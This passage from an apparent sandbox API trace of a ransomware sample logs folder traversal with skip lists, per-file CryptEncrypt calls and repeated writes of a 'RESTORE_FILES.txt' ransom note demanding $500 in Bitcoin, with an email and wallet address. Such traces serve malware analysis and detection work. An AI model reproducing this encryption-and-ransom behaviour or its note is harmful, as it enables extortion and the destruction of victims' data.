hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0094.892] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0094.892] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\.." (normalized: "c:\\users\\default\\appdata\\roaming"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.892] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0094.892] lstrcmpiW (lpString1="Credentials", lpString2="Windows") returned -1 [0094.892] lstrcmpiW (lpString1="Credentials", lpString2="Program Files") returned -1 [0094.892] lstrcmpiW (lpString1="Credentials", lpString2="Program Files (x86)") returned -1 [0094.892] lstrcmpiW (lpString1="Credentials", lpString2="$Recycle.bin") returned 1 [0094.892] lstrcmpiW (lpString1="Credentials", lpString2="System Volume Information") returned -1 [0094.892] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials") returned 58 [0094.892] lstrcmpW (lpString1="Credentials", lpString2=".") returned 1 [0094.892] lstrcmpW (lpString1="Credentials", lpString2="..") returned 1 [0094.893] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\*") returned 60 [0094.893] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0094.893] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.893] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0094.893] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.893] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.893] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.893] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\.") returned 60 [0094.893] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.893] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0094.893] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0094.893] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0094.893] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0094.893] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\credentials\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.893] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.893] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.893] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.894] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.894] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.894] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.894] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\..") returned 61 [0094.894] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.894] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.894] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0094.894] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0094.894] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0094.894] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0094.894] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\.." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.894] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0094.894] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0094.894] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\RESTORE_FILES.txt") returned 76 [0094.894] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\credentials\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0094.895] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.895] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0094.896] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0094.896] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0094.896] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.896] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0094.896] CloseHandle (hObject=0xd8) returned 1 [0094.896] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0094.896] lstrcmpiW (lpString1="Crypto", lpString2="Windows") returned -1 [0094.896] lstrcmpiW (lpString1="Crypto", lpString2="Program Files") returned -1 [0094.896] lstrcmpiW (lpString1="Crypto", lpString2="Program Files (x86)") returned -1 [0094.896] lstrcmpiW (lpString1="Crypto", lpString2="$Recycle.bin") returned 1 [0094.896] lstrcmpiW (lpString1="Crypto", lpString2="System Volume Information") returned -1 [0094.896] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto") returned 53 [0094.896] lstrcmpW (lpString1="Crypto", lpString2=".") returned 1 [0094.896] lstrcmpW (lpString1="Crypto", lpString2="..") returned 1 [0094.897] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\*") returned 55 [0094.897] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0094.897] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.897] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0094.897] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.897] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.897] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.897] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\.") returned 55 [0094.897] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.897] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0094.897] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0094.897] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0094.897] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0094.897] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\crypto\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.897] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.897] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.897] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.897] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.897] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.897] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.897] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\..") returned 56 [0094.897] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.898] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.898] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0094.898] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0094.898] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0094.898] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0094.898] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\.." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.898] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.898] lstrcmpiW (lpString1="RSA", lpString2="Windows") returned -1 [0094.898] lstrcmpiW (lpString1="RSA", lpString2="Program Files") returned 1 [0094.898] lstrcmpiW (lpString1="RSA", lpString2="Program Files (x86)") returned 1 [0094.898] lstrcmpiW (lpString1="RSA", lpString2="$Recycle.bin") returned 1 [0094.898] lstrcmpiW (lpString1="RSA", lpString2="System Volume Information") returned -1 [0094.898] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA") returned 57 [0094.898] lstrcmpW (lpString1="RSA", lpString2=".") returned 1 [0094.898] lstrcmpW (lpString1="RSA", lpString2="..") returned 1 [0094.898] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*") returned 59 [0094.898] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0094.898] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.899] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0094.899] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.899] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.899] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.899] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\.") returned 59 [0094.899] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.899] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0094.899] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0094.899] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.899] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.899] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\crypto\\rsa\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.899] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.899] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.899] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.899] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.899] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.899] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.899] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\..") returned 60 [0094.899] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.899] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.899] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0094.899] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0094.899] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.899] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.899] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\.." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\crypto"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.900] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0094.900] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0094.900] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\RESTORE_FILES.txt") returned 75 [0094.900] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\crypto\\rsa\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0094.900] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.900] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0094.901] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0094.901] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0094.901] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.902] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0094.902] CloseHandle (hObject=0x14c) returned 1 [0094.902] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0094.902] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0094.902] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RESTORE_FILES.txt") returned 71 [0094.902] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\crypto\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0094.902] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.902] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0094.903] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0094.904] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0094.904] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.904] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0094.904] CloseHandle (hObject=0xd8) returned 1 [0094.904] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0094.904] lstrcmpiW (lpString1="Internet Explorer", lpString2="Windows") returned -1 [0094.904] lstrcmpiW (lpString1="Internet Explorer", lpString2="Program Files") returned -1 [0094.904] lstrcmpiW (lpString1="Internet Explorer", lpString2="Program Files (x86)") returned -1 [0094.904] lstrcmpiW (lpString1="Internet Explorer", lpString2="$Recycle.bin") returned 1 [0094.904] lstrcmpiW (lpString1="Internet Explorer", lpString2="System Volume Information") returned -1 [0094.904] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: 